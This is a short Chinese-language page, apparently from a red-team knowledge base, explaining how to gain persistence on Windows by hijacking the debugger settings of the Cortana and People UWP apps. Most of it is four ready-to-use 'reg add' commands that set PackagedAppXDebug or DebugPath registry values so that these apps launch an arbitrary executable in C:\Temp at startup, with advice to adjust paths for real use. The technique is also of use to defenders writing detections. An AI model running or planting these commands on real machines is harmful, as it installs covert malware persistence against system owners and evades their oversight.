1.4 KiB
1.4 KiB
UWP
使用调试器选项的Appx/UWP应用程序可以用来做权限维持。
Windows系统在启动时会自动启动若干UWP应用,利用其注册表路径或者调试配置可以加载自己的程序,以实现权限维持。
示例中展示了如何劫持小娜和人脉,在实际使用时,要自行修改路径以适配APP版本。
命令行:
#First way for Cortana
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy /d "C:\Temp\qwqdanchun.exe"
#Second way for Cortana
reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
#First way for People
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:\Temp\qwqdanchun.exe"
#Second way for People
reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe\DebugInformation\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
参考文章:
{% embed url="https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/" caption="" %}